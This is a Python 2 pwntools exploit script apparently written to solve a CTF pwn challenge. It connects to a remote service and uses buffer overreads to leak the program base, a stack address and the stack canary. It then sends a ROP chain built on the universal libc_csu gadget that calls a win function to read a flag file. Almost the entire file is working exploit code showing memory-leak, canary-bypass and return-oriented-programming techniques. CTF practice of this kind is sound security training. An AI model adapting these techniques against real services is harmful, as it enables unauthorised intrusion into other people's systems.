#!/usr/bin/env python2
from pwn import *
import sys
# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
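def fail(msg):
    """Log *msg* as an exploit failure and terminate with exit status 1.

    Uses sys.exit() rather than the site-provided exit() builtin, which is
    a convenience added by site.py and is absent under ``python -S``.
    """
    log.info("Exploit failed: {}".format(msg))
    sys.exit(1)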
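def success(msg):
    """Log *msg* at pwntools' success level and terminate with status 1337.

    1337 is a deliberate non-zero marker status, so a wrapper that treats
    only 0 as success will still see this run as "failed".  sys.exit() is
    used instead of the site.py exit() builtin for the same reason as fail().
    """
    log.success("{}".format(msg))
    sys.exit(1337)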
def main():
    """Run the exchange against HOST:PORT (taken from sys.argv[1]).

    Returns the stripped flag line on success, or None if any step raised.
    The indentation below is reconstructed; the published listing lost it.
    """
    INTRO = False
    HOST, PORT = sys.argv[1].split(':')
    try:
        for z in range(20):
            io = remote(HOST, PORT)
            # step 0: show sexy banner (the trailing '<-- ' prompt is cut off)
            banner = io.recvuntil('<-- ')[:-4]
            if INTRO is False:
                print banner
                INTRO = True
            # step 1: leak the base
            # The echoed line is sliced just past the 0x18 sent bytes (after a
            # 4-byte prefix) to take 6 bytes, NUL-padded to 8 for u64().
            # 0xd5d is presumably the offset of that pointer from the image base.
            io.sendline('x'*0x18)
            base = io.recvline().strip()[4+0x18:4+6+0x18]
            base += '\x00'*(8-len(base))
            base = u64(base) - 0xd5d
            # log.info('base: 0x%012x' % base)
            # step 2: leak the stack -- same pattern with 0x40 bytes; the
            # leaked pointer is adjusted down by 0x130.
            print io.recvuntil('<-- ')[:-4]
            io.sendline('x'*0x40)
            stack = io.recvline().strip()[4+0x40:4+6+0x40]
            stack += '\x00'*(8-len(stack))
            stack = u64(stack) - 0x130
            # log.info('stack: 0x%012x' % stack)
            # step 3: leak canary -- only 7 bytes come back; the canary's
            # 0x00 low byte is re-added in front before unpacking.
            io.recvuntil('<-- ')
            io.sendline('x'*0x49)
            canary = io.recvline().strip()[4+0x49:4+7+0x49]
            canary = '\x00'+canary
            canary = u64(canary)
            # log.info('canary: 0x%012x' % canary)
            # step 4: use universal gadget to set rdx and call win function to read the file
            rop = cyclic(0x40)
            rop += p64(base+0xd80) # fini
            rop += p64(canary)
            rop += p64(0x00) #rbp
            rop += p64(base+0xd66) # universal part 1
            rop += 'junkjunk'
            rop += p64(0x00) # rbx
            rop += p64(0x01) # rbp
            rop += p64(stack+0x40) # r12 -> stack -> fini
            rop += p64(0x00) # r13 -> rdi
            rop += p64(0x00) # r14 -> rsi
            rop += 'SSSSSSSS' # r15 -> rdx (placeholder, patched below)
            rop += p64(base+0xd50) # universal part 2
            rop += 'junkjunk'
            rop += p64(0x00) # rbx
            rop += p64(base+0x202400) # rbp
            rop += p64(0x00) # r12
            rop += p64(0x00) # r13
            rop += p64(0x00) # r14
            rop += p64(0x00) # r15
            rop += p64(base+0xaed) # win(0, 0, "/home/baby4/flag")
            rop += p64(base+0xacc) # quit()
            # The 8-byte 'SSSSSSSS' placeholder becomes a pointer to the end of
            # the chain, where the './flag\x00' string is appended next.
            # NOTE(review): the win() comment above names "/home/baby4/flag"
            # while the path actually sent is './flag'.
            rop = rop.replace('SSSSSSSS', p64(stack+len(rop)))
            rop += './flag\x00'
            # step 5: send rop chain and get flag
            io.recvuntil('<-- ')
            io.sendline(rop)
            io.recvuntil('<-- ')
            io.sendline('')
            flag = io.recvline().strip()
            # Every path through the loop body returns or raises, so the
            # range(20) loop never actually iterates a second time.
            return flag
    except:
        # NOTE(review): bare except swallows everything, including
        # KeyboardInterrupt. If remote() itself raised on the first attempt,
        # io is still unbound here and this close() raises UnboundLocalError.
        io.close()
        return None
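if __name__ == '__main__':
    # Usage: <script> HOST:PORT -- main() parses sys.argv[1] itself.
    if len(sys.argv) < 2:
        fail('No target')
    flag = main()
    # main() returns None when the exchange raised; guard before startswith()
    # so that path is reported through fail() rather than an AttributeError.
    if flag and flag.startswith("sctf{"):
        success(flag)
    fail("")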